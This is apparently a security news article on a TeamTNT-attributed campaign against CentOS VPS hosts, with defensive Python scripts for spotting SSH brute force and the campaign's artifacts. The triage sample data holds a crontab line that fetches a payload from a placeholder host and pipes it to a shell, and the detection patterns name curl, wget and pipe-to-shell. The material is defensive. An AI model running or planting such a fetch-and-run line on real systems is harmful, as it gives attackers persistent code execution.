Recent developments in cloud computing have made IT operations more straightforward but have also brought about new security challenges.
Threat actors like TeamTNT exploit vulnerabilities in cloud services (AWS, Azure, etc.) and containerization tools (Docker, Kubernetes) to steal credentials, install backdoors, mine cryptocurrency, and compromise public resources.
TeamTNT has been active since 2019, and although the group went quiet on social media in 2022, attacks attributed to it continued through 2023 and 2024.
The latest campaign targets CentOS-based VPS instances with a multi-stage process that begins with SSH brute-force attacks to obtain initial access.
Once inside, the attackers upload a malicious script that disables security controls, deletes logs, modifies system files, kills any cryptocurrency miners already running, removes Docker containers, and redirects DNS resolution to Google’s public servers.
To maintain persistence and control, they install the Diamorphine rootkit and use custom tools, then lock the system down by setting immutable file attributes, creating a backdoor user, and erasing command history to hide their activity.
Group-IB researchers discovered the campaign, which targets VPS cloud infrastructure running CentOS: the attacker gains initial access by brute-forcing SSH credentials and then uploads a malicious script.
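The initial-access step is visible in the sshd entries of /var/log/secure on CentOS. The following is an added example, not code from Group-IB or from the campaign itself, that flags source addresses producing a burst of failed logins and then reports any later accepted login from a flagged address, which is the pattern a successful brute force leaves behind. The log lines are constructed, the year 2024 is assumed for the year-less syslog timestamps, and the threshold of five failures within 60 seconds is a tunable assumption.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed sample of /var/log/secure sshd lines (CentOS), not real data.
SAMPLE_LOG = """\
Sep 12 03:14:01 vps1 sshd[2201]: Failed password for root from 203.0.113.45 port 51234 ssh2
Sep 12 03:14:02 vps1 sshd[2203]: Failed password for root from 203.0.113.45 port 51236 ssh2
Sep 12 03:14:03 vps1 sshd[2205]: Failed password for invalid user admin from 203.0.113.45 port 51238 ssh2
Sep 12 03:14:04 vps1 sshd[2207]: Failed password for root from 203.0.113.45 port 51240 ssh2
Sep 12 03:14:05 vps1 sshd[2209]: Failed password for root from 203.0.113.45 port 51242 ssh2
Sep 12 03:14:07 vps1 sshd[2211]: Accepted password for root from 203.0.113.45 port 51244 ssh2
Sep 12 03:20:11 vps1 sshd[2300]: Failed password for alice from 198.51.100.7 port 40000 ssh2
Sep 12 03:20:40 vps1 sshd[2302]: Accepted publickey for alice from 198.51.100.7 port 40002 ssh2
"""

WINDOW_SECONDS = 60   # assumed detection window
THRESHOLD = 5         # assumed number of failures per window that counts as a burst

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?P<method>password|publickey) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def parse_line(line, year=2024):
    """Parse one sshd auth line; syslog omits the year, so one is assumed."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return {"ts": ts, "result": m["result"], "method": m["method"],
            "user": m["user"], "ip": m["ip"]}


def analyze(log_text, threshold=THRESHOLD, window=WINDOW_SECONDS):
    """Sliding-window count of failures per source IP; an accepted login from an
    IP that already crossed the threshold is reported as a likely compromise."""
    failures = defaultdict(deque)   # ip -> timestamps of recent failures
    brute_forcers = {}              # ip -> failure count when first flagged
    compromises = []                # (ip, user, method, timestamp)
    for line in log_text.splitlines():
        ev = parse_line(line)
        if ev is None:
            continue
        ip = ev["ip"]
        if ev["result"] == "Failed":
            q = failures[ip]
            q.append(ev["ts"])
            while (ev["ts"] - q[0]).total_seconds() > window:
                q.popleft()
            if len(q) >= threshold and ip not in brute_forcers:
                brute_forcers[ip] = len(q)
        elif ip in brute_forcers:
            compromises.append((ip, ev["user"], ev["method"], ev["ts"]))
    return {"brute_forcers": brute_forcers, "compromises": compromises}


if __name__ == "__main__":
    result = analyze(SAMPLE_LOG)
    for ip, n in result["brute_forcers"].items():
        print(f"[!] brute force from {ip}: {n} failures within {WINDOW_SECONDS}s")
    for ip, user, method, ts in result["compromises"]:
        print(f"[!!] {ts} accepted {method} login for {user} from flagged {ip}")
```

On a real host the same logic can be fed `journalctl -u sshd` or the rotated /var/log/secure files; the single legitimate failure from 198.51.100.7 followed by a key-based login is not flagged, which is the false-positive case a threshold on failures per window is meant to avoid.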
The script first checks for existing miners and disables security measures such as the firewall and SELinux. It then searches for cryptocurrency mining processes and kills them, matching process names and other signatures of known miners so that the host’s CPU is free for the attacker’s own payload.
It interacts with Docker to remove containerized miners and changes the DNS configuration. A custom tool named “tntrecht” is also dropped and used to modify the permissions of legitimate processes.
The script establishes persistence by adding a crontab entry that executes its code every 30 minutes; the entry downloads a payload from a remote server, and the cron line is disguised with a timestamp so it blends in with legitimate entries.
It then deploys Diamorphine, an open-source loadable kernel module (LKM) rootkit designed to hide malicious activity and grant the attacker root privileges. The rootkit loads silently and hides itself from the module list, hides or unhides a process when that process is sent a specific signal, gives root to the calling process on request, and makes files and directories whose names carry a chosen prefix invisible.
Having compromised the system, the threat actor tightened their control by locking down system files and blocking recovery attempts, setting immutable attributes with the chattr command and the tntrecht tool.
They secured persistent access by creating a backdoor user with root privileges and configuring SSH public-key authentication for it. To avoid detection, they changed the SSH port, altered firewall rules, and cleared the bash history.
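Each of the post-exploitation steps described above (the cron fetch, disabled SELinux, immutable attributes, the extra UID-0 user, the added SSH key, the moved SSH port, the public DNS resolvers and the hidden kernel module) leaves an artifact that a responder can check. The script below is an added triage example, not Group-IB’s tooling and not the attacker’s script, written to run over constructed file contents and command output; the attacker address, payload name, account name and key strings are invented placeholders. Because Diamorphine hides processes and files on the live system, run checks like these from a rescue environment or against a mounted disk image rather than on the compromised host. The hidden-module check compares /proc/modules with the directories under /sys/module that carry an initstate file, which is assumed here to separate loadable modules from built-in ones.

```python
import re

# Constructed sample artifacts, as read from a mounted disk image or command
# output on a CentOS VPS. Illustrative placeholders only, not incident data.
ARTIFACTS = {
    "crontab": (
        "*/30 * * * * curl -s http://203.0.113.9/payload.sh | sh\n"
        "0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf\n"
    ),
    "passwd": (
        "root:x:0:0:root:/root:/bin/bash\n"
        "bin:x:1:1:bin:/bin:/sbin/nologin\n"
        "sysadm:x:0:0::/home/sysadm:/bin/bash\n"
    ),
    "selinux_config": "SELINUX=disabled\nSELINUXTYPE=targeted\n",
    "sshd_config": "Port 2222\nPasswordAuthentication yes\nPermitRootLogin yes\n",
    "resolv_conf": "nameserver 8.8.8.8\nnameserver 8.8.4.4\n",
    "lsattr": (
        "----i---------e------- /etc/passwd\n"
        "--------------e------- /etc/hosts\n"
        "----i---------e------- /etc/ssh/sshd_config\n"
    ),
    # Module names from /proc/modules versus /sys/module entries that have an
    # 'initstate' file (assumed to mark loadable, not built-in, modules).
    "proc_modules": ["xfs", "ip_tables"],
    "sys_modules": ["xfs", "ip_tables", "diamorphine"],
    "authorized_keys": (
        "ssh-ed25519 AAAAC3NzaLEGITKEY admin@corp\n"
        "ssh-rsa AAAAB3NzaUNKNOWNKEY tnt@attacker\n"
    ),
    "known_keys": {"ssh-ed25519 AAAAC3NzaLEGITKEY admin@corp"},  # assumed baseline
}

REMOTE_FETCH = re.compile(r"\b(curl|wget)\b.*https?://")
PIPE_TO_SHELL = re.compile(r"\|\s*(sh|bash)\b")
PUBLIC_DNS = {"8.8.8.8", "8.8.4.4"}


def check_crontab(text):
    """Flag cron entries that download or pipe remote code (the 30-minute fetch)."""
    hits = []
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        fields = line.split(None, 5)
        if fields[0].startswith("@") and len(fields) >= 2:   # @reboot, @hourly ...
            schedule, cmd = fields[0], " ".join(fields[1:])
        elif len(fields) == 6:
            schedule, cmd = " ".join(fields[:5]), fields[5]
        else:
            continue
        if REMOTE_FETCH.search(cmd) or PIPE_TO_SHELL.search(cmd):
            hits.append(f"cron '{schedule}' runs remote code: {cmd}")
    return hits


def check_uid0(passwd_text):
    """Any UID-0 account other than root is a backdoor-user candidate."""
    hits = []
    for line in passwd_text.splitlines():
        f = line.split(":")
        if len(f) >= 3 and f[2] == "0" and f[0] != "root":
            hits.append(f"extra UID 0 account: {f[0]}")
    return hits


def check_selinux(text):
    m = re.search(r"^SELINUX=(\w+)", text, re.M)
    return [f"SELinux mode is {m.group(1)}"] if m and m.group(1) != "enforcing" else []


def check_sshd(text):
    """Moved port plus password/root login left enabled match the campaign."""
    hits = []
    for key, val in re.findall(r"^\s*(\w+)\s+(\S+)", text, re.M):
        k, v = key.lower(), val.lower()
        if k == "port" and v != "22":
            hits.append(f"sshd moved to port {val}")
        elif k == "passwordauthentication" and v == "yes":
            hits.append("sshd accepts passwords (brute-forceable)")
        elif k == "permitrootlogin" and v == "yes":
            hits.append("sshd permits root password login")
    return hits


def check_resolv(text):
    ns = re.findall(r"^nameserver\s+(\S+)", text, re.M)
    return [f"resolver redirected to {ip}" for ip in ns if ip in PUBLIC_DNS]


def check_immutable(lsattr_text):
    """lsattr prints the attribute string then the path; 'i' means immutable."""
    hits = []
    for line in lsattr_text.splitlines():
        flags, _, path = line.partition(" ")
        if "i" in flags:
            hits.append(f"immutable attribute on {path}")
    return hits


def check_hidden_modules(proc_modules, sys_modules):
    """A module unlinked from the kernel's module list (how Diamorphine hides
    itself) vanishes from lsmod and /proc/modules but keeps its /sys/module dir."""
    hidden = sorted(set(sys_modules) - set(proc_modules))
    return [f"module hidden from /proc/modules: {m}" for m in hidden]


def check_authorized_keys(text, known):
    return [f"unknown authorized key: {l.split()[-1]}"
            for l in text.splitlines() if l.strip() and l.strip() not in known]


def triage(a):
    """Run every check and return the combined list of findings."""
    return (check_crontab(a["crontab"]) + check_uid0(a["passwd"])
            + check_selinux(a["selinux_config"]) + check_sshd(a["sshd_config"])
            + check_resolv(a["resolv_conf"]) + check_immutable(a["lsattr"])
            + check_hidden_modules(a["proc_modules"], a["sys_modules"])
            + check_authorized_keys(a["authorized_keys"], a["known_keys"]))


if __name__ == "__main__":
    for finding in triage(ARTIFACTS):
        print("[!]", finding)
```

Any single finding is weak on its own (an admin may legitimately move the SSH port or use 8.8.8.8), but several of them together on one host, especially an immutable /etc/passwd next to an extra UID-0 account, describe exactly the lockdown this campaign performs.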
Group-IB’s analysis concludes that a sophisticated threat actor, most likely TeamTNT, carried out a highly automated and carefully planned attack that covered initial access, neutralising competing miners, blocking recovery, and causing significant damage to the affected hosts.
To mitigate similar threats, organizations are advised to apply security patches promptly, configure host firewalls, replace SSH password logins with key-based authentication and rate-limit or block repeated failed logins, keep SELinux enforcing, restrict administrative access, and deploy intrusion detection together with file integrity monitoring on crontabs, /etc/passwd, sshd_config and authorized_keys so that the changes this campaign makes are caught early.